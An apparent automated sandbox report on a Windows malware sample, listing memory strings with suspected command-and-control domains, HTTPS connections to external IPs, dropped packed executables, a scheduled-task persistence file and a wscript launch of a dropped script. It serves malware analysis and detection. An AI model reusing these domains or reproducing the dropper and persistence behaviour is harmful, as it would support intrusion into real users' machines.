                              Source: Seat.com, 00000022.00000000.1614707823.0000000000E85000.00000002.00000001.01000000.0000001E.sdmp, Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmp, TradeHub.com, 0000002B.00000000.1645400636.0000000000EC5000.00000002.00000001.01000000.00000021.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.00000000094F2000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C1C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.000000000588D000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.00000000098BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                              Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                              Source: 2R0700.exe, 00000005.00000003.1057416409.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                              Source: 2R0700.exe, 00000005.00000003.1057416409.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                              Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: 2R0700.exe, 00000005.00000003.1057416409.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                              Source: 2R0700.exe, 00000005.00000003.1057416409.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                              Source: 2R0700.exe, 00000005.00000003.1128700937.000000000070A000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208651372.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.996560041.0000000000687000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209776216.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208885485.00000000006F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run/
Source: 2R0700.exe, 00000005.00000003.1146995840.000000000070A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://defaulemot.run/Ky
Source: 2R0700.exe, 00000005.00000003.1208651372.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209776216.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208885485.00000000006F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://defaulemot.run/Ry
Source: 2R0700.exe, 00000005.00000003.1055278526.0000000005479000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.996393122.0000000000690000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1146685669.0000000005471000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208628837.0000000005471000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1146846803.0000000005463000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1213395650.0000000005471000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1055723819.000000000547B000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1055565602.000000000547A000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1027935027.0000000005471000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://defaulemot.run/jUSiaz
Source: 2R0700.exe, 00000005.00000003.1055278526.0000000005479000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1055723819.000000000547B000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1055565602.000000000547A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://defaulemot.run/jUSiaz#
Source: 2R0700.exe, 00000005.00000003.996560041.0000000000679000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://defaulemot.run:443/jUSiaz
Source: 2R0700.exe, 00000005.00000003.1127856691.0000000000679000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://defaulemot.run:443/jUSiazal
Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: pwHxMTy.exe, 0000002E.00000002.2028264200.00000000012FC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fostinjec.to
Source: pwHxMTy.exe, 0000002E.00000002.2032481267.000000000375E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fostinjec.today/
Source: pwHxMTy.exe, 0000002E.00000002.2032481267.000000000375E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fostinjec.today/:
Source: pwHxMTy.exe, 0000002E.00000002.2024057928.000000000125F000.00000004.00000020.00020000.00000000.sdmp, pwHxMTy.exe, 0000002E.00000002.2026097250.00000000012BB000.00000004.00000020.00020000.00000000.sdmp, pwHxMTy.exe, 0000002E.00000002.2026097250.00000000012D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fostinjec.today/LksNAz
Source: pwHxMTy.exe, 0000002E.00000002.2032481267.000000000375E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fostinjec.today/wj
Source: pwHxMTy.exe, 0000002E.00000002.2024766595.0000000001267000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fostinjec.today:443/LksNAz
Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
Source: 2R0700.exe, 00000005.00000003.1057416409.000000000071C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
Source: 2R0700.exe, 00000005.00000003.1056980445.0000000005572000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 2R0700.exe, 00000005.00000003.1056980445.0000000005572000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 2R0700.exe, 00000005.00000003.1057416409.000000000071C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.com/repository/0
Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: 2R0700.exe, 00000005.00000003.1057416409.000000000071C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: 2R0700.exe, 00000005.00000003.1056980445.0000000005572000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: 2R0700.exe, 00000005.00000003.1056980445.0000000005572000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: 2R0700.exe, 00000005.00000003.1056980445.0000000005572000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: 2R0700.exe, 00000005.00000003.1056980445.0000000005572000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 2R0700.exe, 00000005.00000003.1056980445.0000000005572000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49681 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49682 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49683 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49684 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49685 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49686 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49687 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49729 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.201:443 -> 192.168.2.7:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 82.115.223.119:443 -> 192.168.2.7:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.201:443 -> 192.168.2.7:49759 version: TLS 1.2

                              Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe entropy: 7.99094598516
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\packed[1].exe entropy: 7.99646905387
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10123540101\packed.exe entropy: 7.99646905387
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\ADFoyxP[1].exe entropy: 7.99051565952
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe entropy: 7.99051565952
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe | File created: C:\Users\user\AppData\Local\Temp\4e031b4c entropy: 7.9980280431
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\han entropy: 7.99464114977
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Argentina.pub entropy: 7.99765353495
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Distinguished.pub entropy: 7.99809266375
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Poem.pub entropy: 7.99733876431
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Governor.pub entropy: 7.99796220639
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Swingers.pub entropy: 7.99812528823
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Legislation.pub entropy: 7.99786443988
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Explicitly.pub entropy: 7.99686467774
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Comparison.pub entropy: 7.99674290091
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Enlarge.pub entropy: 7.99778287234
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Listening.pub entropy: 7.99720925196
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Gate.pub entropy: 7.9966611885
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Preference.pub entropy: 7.99684640346
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Apartments.pub entropy: 7.99764085482
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Republican.pub entropy: 7.99632178366
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Amenities.pub entropy: 7.99702026084
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Worcester.pub entropy: 7.99796554729
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Generating.pub entropy: 7.99807030539
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Regulation.pub entropy: 7.99630322854
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Performing.pub entropy: 7.99750792054
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Robert.pub entropy: 7.99725695551
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Maintains.pub entropy: 7.99814457245
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Document.pub entropy: 7.99688077856
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Confusion.pub entropy: 7.99759203123
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Reverse.pub entropy: 7.99813463449
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Vacation.pub entropy: 7.99753681116
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Vampire.pub entropy: 7.99666754967
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Blood.pub entropy: 7.99804267671
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Hell.pub entropy: 7.99698268184
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Breaks.pub entropy: 7.99810429407
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Concept.pub entropy: 7.99720276963
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Really.pub entropy: 7.99835078472
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Urban.pub entropy: 7.99778737709
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Trademarks.pub entropy: 7.99757414761
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Thousand.pub entropy: 7.99729046263
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Silly.pub entropy: 7.99829492948
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Both.pub entropy: 7.99806131353
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Bull.pub entropy: 7.99770447322
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\353090\m entropy: 7.99992399201
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | File created: C:\Users\user\AppData\Local\TradeSecure Innovations\F entropy: 7.99992399201
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\uvwnwebboksg entropy: 7.99464114977

                              System Summary

Source: 3E11p.exe.0.dr | Static PE information: section name:
Source: 3E11p.exe.0.dr | Static PE information: section name: .idata
Source: 3E11p.exe.0.dr | Static PE information: section name:
Source: 1E08u3.exe.1.dr | Static PE information: section name:
Source: 1E08u3.exe.1.dr | Static PE information: section name: .idata
Source: 1E08u3.exe.1.dr | Static PE information: section name:
Source: 2R0700.exe.1.dr | Static PE information: section name:
Source: 2R0700.exe.1.dr | Static PE information: section name: .idata
Source: rapes.exe.2.dr | Static PE information: section name:
Source: rapes.exe.2.dr | Static PE information: section name: .idata
Source: rapes.exe.2.dr | Static PE information: section name:
Source: bncn6rv.exe.9.dr | Static PE information: section name:
Source: bncn6rv.exe.9.dr | Static PE information: section name: .rsrc
Source: bncn6rv.exe.9.dr | Static PE information: section name: .idata
Source: bncn6rv.exe.9.dr | Static PE information: section name:
Source: bncn6rv[1].exe.9.dr | Static PE information: section name:
Source: bncn6rv[1].exe.9.dr | Static PE information: section name: .rsrc
Source: bncn6rv[1].exe.9.dr | Static PE information: section name: .idata
Source: bncn6rv[1].exe.9.dr | Static PE information: section name:
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe | Code function: 16_2_0077A88F NtQuerySystemInformation
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Code function: 0_2_00FA1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Code function: 1_2_00921F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | File created: C:\Windows\Tasks\rapes.job
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Windows\PerfectlyFda
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Windows\AccreditationShed
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Windows\GovernmentsHighly
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Windows\HighKerry
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Windows\PracticalPrevent
